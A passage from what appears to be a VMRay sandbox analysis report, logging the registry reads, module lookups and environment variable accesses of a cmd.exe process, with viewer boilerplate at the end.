Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x8a0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75e90000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75ea4f70 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75ea4330 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75ea5930 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 True 1
Fn
Environment (11)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\FD1HVy\Desktop True 1
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image